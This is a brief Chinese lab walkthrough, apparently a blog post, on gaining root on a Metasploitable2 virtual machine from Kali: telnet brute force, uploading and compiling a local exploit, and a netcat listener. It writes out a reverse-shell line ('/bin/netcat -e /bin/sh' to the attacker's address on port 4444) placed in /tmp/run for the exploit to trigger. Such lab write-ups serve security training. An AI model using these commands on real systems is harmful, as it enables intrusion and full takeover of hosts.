一、实验环境
目标主机: Metasploit2虚拟机 192.168.20.143
攻击主机: Kali2虚拟机 192.168.20.133
二、实验过程
1.msf登录telnet
详情参考Telnet暴力破解_Myu_wzy的博客-CSDN博客此文章
2.msf连接shell下载exploit
在本地下载exploit,并将文件名修改为test.c(文本尾部多加几行空格)
连接shell下载本机的test.c文件
3.设置kali nc监听,进行监控4444端口
4.编译执行exploit,获取root权限
编译exploit文件
gcc 源文件 -o exploit
echo '#!/bin/sh' > /tmp/run
echo '/bin/netcat -e /bin/sh 本机地址 4444' >> /tmp/run
执行exploit ,具有root权限的pid -1:
./exploit 2737
5.验证登录用户的权限
